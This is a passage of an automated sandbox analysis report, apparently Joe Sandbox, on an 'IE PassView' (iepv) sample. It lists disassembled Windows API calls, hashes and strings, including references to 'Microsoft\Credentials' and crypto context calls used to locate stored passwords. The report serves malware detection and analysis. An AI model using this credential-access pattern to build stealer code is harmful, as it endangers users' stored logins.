                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString_mbscpymemset
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                        • API String ID: 408644273-3424043681
                                        • Opcode ID: 50f65c9c75391e1ee23d2ad7ec9f945dc9bd406b076fe35e90e64b3f3f723888
                                        • Instruction ID: d2185ea61b782a82967e3816b37e7080ad77801d9a3ce128af9e194d45c68cec
                                        • Opcode Fuzzy Hash: 50f65c9c75391e1ee23d2ad7ec9f945dc9bd406b076fe35e90e64b3f3f723888
                                        • Instruction Fuzzy Hash: E1F0E9729041A87BDB239794DC01FCA779C9B08305F1040B6B789F10C0D6F8AEC48BAD
                                        APIs
                                          • Part of subcall function 0040579F: memset.MSVCRT ref: 004057A9
                                          • Part of subcall function 0040579F: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 004057E9
                                        • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                        • String ID: MS Sans Serif
                                        • API String ID: 3492281209-168460110
                                        • Opcode ID: de1f4aa0b43da6159be95dbce1760fa1eb4319b3e27b373a6c962ee0d067ba13
                                        • Instruction ID: fff5adc68d9bba56841c83886f3a61a5973af893ea5221fedb052cbc4926c7a1
                                        • Opcode Fuzzy Hash: de1f4aa0b43da6159be95dbce1760fa1eb4319b3e27b373a6c962ee0d067ba13
                                        • Instruction Fuzzy Hash: 82F0A775A40304B7E72267A1DD4BF4A7BACAB40B00F108535F661B91F2D6F46514CB59
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ClassName_strcmpimemset
                                        • String ID: edit
                                        • API String ID: 275601554-2167791130
                                        • Opcode ID: e407a713191406d9c0c3c55480dd094b490590bba3a80008235b6a85753bc709
                                        • Instruction ID: 222c5e45a5ad01b59d3a404b3fc84ac9812acc6f498e24d232171e3b7a5840fc
                                        • Opcode Fuzzy Hash: e407a713191406d9c0c3c55480dd094b490590bba3a80008235b6a85753bc709
                                        • Instruction Fuzzy Hash: 10E09BB3C4412E6ADB25A6A4DC01FE5376CDF14305F0401B6F949F10C1E5B4A6884795
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat
                                        • String ID: Microsoft\Credentials
                                        • API String ID: 3951308622-3148402405
                                        • Opcode ID: 89e218f53934e3a49db4fc65d04970d3dbd2527a65af051a0b9feb1739d9749b
                                        • Instruction ID: 05e85e3a1237bcdb536053856754acaa178e34bce0c20ab88a5daf693b674428
                                        • Opcode Fuzzy Hash: 89e218f53934e3a49db4fc65d04970d3dbd2527a65af051a0b9feb1739d9749b
                                        • Instruction Fuzzy Hash: A8D09EB3D0952016E61531677C8A95B8ADCC9E277C325157FF404B71C1E87D988641BD
                                        APIs
                                        • LoadLibraryA.KERNEL32(shell32.dll,0040CF03), ref: 0040CED3
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040CEE8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                        • API String ID: 2574300362-543337301
                                        • Opcode ID: e48987c715c5e532cf4409d5839baa7e7cfb35eb4a8deaba8e93e326759bab4d
                                        • Instruction ID: e58cfcfb905dacea4eb30ad829829929964992e20368f8c1a33815eb627db913
                                        • Opcode Fuzzy Hash: e48987c715c5e532cf4409d5839baa7e7cfb35eb4a8deaba8e93e326759bab4d
                                        • Instruction Fuzzy Hash: 12D092746402429BD7209F22EE497423AA4A700701F1085BAA044F16A0DAB8906A9F5C
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • memset.MSVCRT ref: 00403581
                                        • memset.MSVCRT ref: 00403595
                                        • memset.MSVCRT ref: 004035A9
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,00000000), ref: 004035B9
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 004035C9
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$AcquireContextCrypt
                                        • String ID:
                                        • API String ID: 208668350-0
                                        • Opcode ID: 64eca37d22c3f95fb91b8198635d72de67174192487b0545c08c119533ec8301
                                        • Instruction ID: 4b6ae2541e05763db9ab669e9c4983ddea4fea9d27cd128077aeab09cafa718f
                                        • Opcode Fuzzy Hash: 64eca37d22c3f95fb91b8198635d72de67174192487b0545c08c119533ec8301
                                        • Instruction Fuzzy Hash: 3921307180011EBEDB11EE69CC85FEF7BACEF15345F0040BAB918E6052D7389B488B65
                                        APIs
                                          • Part of subcall function 004085DD: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004085FF
                                          • Part of subcall function 004085DD: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00408694
                                        • strlen.MSVCRT ref: 00409D2F
                                        • atoi.MSVCRT(?), ref: 00409D3D
                                        • _mbsicmp.MSVCRT ref: 00409D90
                                        • _mbsicmp.MSVCRT ref: 00409DA3
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                        • String ID:
                                        • API String ID: 4107816708-0
                                        • Opcode ID: 9d3511cc85c0046a82ba62c2ff37d56c4493560d2b22a3d66afa5ac120808968
                                        • Instruction ID: 6ed8edb2de1c4c6dca683edd5c99256fa7e153bea9141607462d192657b5517c
                                        • Opcode Fuzzy Hash: 9d3511cc85c0046a82ba62c2ff37d56c4493560d2b22a3d66afa5ac120808968
                                        • Instruction Fuzzy Hash: 3A412934904704AFDB20DF69D980A9AB7F4FF48318F10486EE855E7392D778AA918B54
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402028
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040203B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040204E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402061
                                          • Part of subcall function 00401D25: _mbscmp.MSVCRT ref: 00401D35
                                          • Part of subcall function 00408B6F: free.MSVCRT ref: 00408BBA
                                          • Part of subcall function 00408B6F: memcpy.MSVCRT(00000000,?,?,?,?,?,00401FE9,?), ref: 00408BFB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_mbscmpfreememcpy
                                        • String ID:
                                        • API String ID: 3415728570-0
                                        • Opcode ID: 2fec005c3c64d1cb68eec752d5c08818aecff286011e2fbf3e21b6ff9f748ece
                                        • Instruction ID: 2ce28415f2b397eb987a407592397fee7a87833c22dd51c9f6902c33bbeb4a34
                                        • Opcode Fuzzy Hash: 2fec005c3c64d1cb68eec752d5c08818aecff286011e2fbf3e21b6ff9f748ece
                                        • Instruction Fuzzy Hash: 95214FF280412DBFDB21DF549C80EEB7B7DEF05368F000295BD29B7191C675AE508AA4
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004020F3
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402109
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040211F
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402134
                                          • Part of subcall function 00401D25: _mbscmp.MSVCRT ref: 00401D35
                                          • Part of subcall function 00408B6F: free.MSVCRT ref: 00408BBA
                                          • Part of subcall function 00408B6F: memcpy.MSVCRT(00000000,?,?,?,?,?,00401FE9,?), ref: 00408BFB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_mbscmpfreememcpy
                                        • String ID:
                                        • API String ID: 3415728570-0
                                        • Opcode ID: 96913ee3da2a935c70f070d31cd78ffe5420479fedd4a40e0b9776260d59d1ca
                                        • Instruction ID: a7e934fef92a8b71a5dd741b586f5c4ad70d0c4e074fa76087a728474342fa1d
                                        • Opcode Fuzzy Hash: 96913ee3da2a935c70f070d31cd78ffe5420479fedd4a40e0b9776260d59d1ca
                                        • Instruction Fuzzy Hash: 232130F690411C7FDB10DB69DC80EDB7BBCEB08268F100265B518E7291D630AE50CB64
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401406,?,?,?,?,0040F4E8,0000000C), ref: 004064DA
                                        • memset.MSVCRT ref: 004064EB
                                        • memcpy.MSVCRT(004119A8,?,00000000,00000000,00000000,00000000,00000000,?,?,00401406,?,?,?,?,0040F4E8,0000000C), ref: 004064F7
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00406504
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 8b4c96493cd9508214da094db5bd26336ef1a00b36f1105ef158eccb79de414b
                                        • Instruction ID: 7332fcc42ad715dc2c562c01f7626adb8d30454791f2fe56a92ceb7b724ebb25
                                        • Opcode Fuzzy Hash: 8b4c96493cd9508214da094db5bd26336ef1a00b36f1105ef158eccb79de414b
                                        • Instruction Fuzzy Hash: 7A116A71604601AFD328DF2DD881A27F7E5EFD8304B21892EE4DA97385DA35E801CB54
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040D01D
                                        • SHBrowseForFolder.SHELL32(?), ref: 0040D04F
                                        • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0040D063
                                        • _mbscpy.MSVCRT(?,?), ref: 0040D076
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPath_mbscpy
                                        • String ID:
                                        • API String ID: 1479990042-0
                                        • Opcode ID: 7e1135835be0e94a21e27305da28ced4eb24b2eb92fad6c8c205bd6e3a39184f
                                        • Instruction ID: 80035aed7d598b413f2d673abd293d15a4d0abcd53c7511a52d4806839a3ef89
                                        • Opcode Fuzzy Hash: 7e1135835be0e94a21e27305da28ced4eb24b2eb92fad6c8c205bd6e3a39184f
                                        • Instruction Fuzzy Hash: 8E11E8B6900209EFDB00DFA9D9889AEBBF8EB49314F10446AE905E7340D735DA05CB65
                                        APIs
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                        • sprintf.MSVCRT ref: 0040A0F4
                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A157
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        • sprintf.MSVCRT ref: 0040A11E
                                        • _mbscat.MSVCRT ref: 0040A131
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModulesprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 2015865870-0
                                        • Opcode ID: 3bacfee5431946e8146b112680c25f6a95579dcafd16ce18d83a6503912c57d7
                                        • Instruction ID: d1cf58fa5dca294d86c7843aa5e5c981824fabe329cc1801f98fe3932a2be64a
                                        • Opcode Fuzzy Hash: 3bacfee5431946e8146b112680c25f6a95579dcafd16ce18d83a6503912c57d7
                                        • Instruction Fuzzy Hash: C60162B29003046BD721B7B5DD87FEB73ACAB04304F04047FB659B61C2DAB8A6444A6A
                                        APIs
                                        • memset.MSVCRT ref: 00409520
                                        • memset.MSVCRT ref: 00409536
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 00409560
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: </%s>
                                        • API String ID: 3699762281-259020660
                                        • Opcode ID: adeeb32083e44ae32bc83bbdb127d7a2a94eeea44e07c9e4799656e228e23114
                                        • Instruction ID: bc821998500ed00f0206f46da861f93d09f5f4896164571df8cee20e405d8a8e
                                        • Opcode Fuzzy Hash: adeeb32083e44ae32bc83bbdb127d7a2a94eeea44e07c9e4799656e228e23114
                                        • Instruction Fuzzy Hash: B10186B290012967DB21A659CC45FDE766C9F55314F0400FAB509F31C2DA749A448BA5
                                        APIs
                                          • Part of subcall function 0040593C: memset.MSVCRT ref: 0040595C
                                          • Part of subcall function 0040593C: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040596F
                                          • Part of subcall function 0040593C: _strcmpi.MSVCRT ref: 00405981
                                        • SetBkMode.GDI32(?,00000001), ref: 0040C854
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040C862
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040C870
                                        • GetStockObject.GDI32(00000000), ref: 0040C878
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_strcmpimemset
                                        • String ID:
                                        • API String ID: 2652942504-0
                                        • Opcode ID: 2250eef6674719bdd7f4dae543dfd5788a0825d0b71622ca88b619b7a1fa905d
                                        • Instruction ID: ffc7004a7d371072b1ff32533f2df7bb14694207d9c7f55142dd8fda8b3e0bcd
                                        • Opcode Fuzzy Hash: 2250eef6674719bdd7f4dae543dfd5788a0825d0b71622ca88b619b7a1fa905d
                                        • Instruction Fuzzy Hash: 4BF08C32100208FBDF152F65EE4AE9E3B21EF04322F108236FA15B41F0CBB58820AA59
                                        APIs
                                        • memcpy.MSVCRT(00411DA8,?,00000050,?,0040144A,?), ref: 0040BEFC
                                        • memcpy.MSVCRT(00411AD8,?,000002CC,00411DA8,?,00000050,?,0040144A,?), ref: 0040BF0E
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF21
                                        • DialogBoxParamA.USER32(00000000,0000006B,?,Function_0000BBF4,00000000), ref: 0040BF35
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 2ace08b6cf9804c4be4aa9429945c127ba00e1c21a3ae0b7d8b7e958248f7000
                                        • Instruction ID: af6fc003c7e3f1047039bfe483d3735f66c7a1dd44f577401d39675ba837eeca
                                        • Opcode Fuzzy Hash: 2ace08b6cf9804c4be4aa9429945c127ba00e1c21a3ae0b7d8b7e958248f7000
                                        • Instruction Fuzzy Hash: 15F08271A807106BD7606BA6FD0AF963AA0EB40B16F14443AF744F51E0C3B554248FDE
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ec10c122f22213a57c04daaa8a719b2651d2619166efef81b8aa6a8e6d18f33d
                                        • Instruction ID: dd39a4462d089017abb554cf892f1597ca5f1ae2b1321b0e7aa42a351a950413
                                        • Opcode Fuzzy Hash: ec10c122f22213a57c04daaa8a719b2651d2619166efef81b8aa6a8e6d18f33d
                                        • Instruction Fuzzy Hash: 84E046A2F0020102DB24BBFAAD80E13239C6B06714714C83FF0A0F72E1CEBCE858812C
                                        APIs
                                        • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0040AFEA
                                        • SetFocus.USER32(?,?,?), ref: 0040B05F
                                        Strings
                                        Memory Dump Source
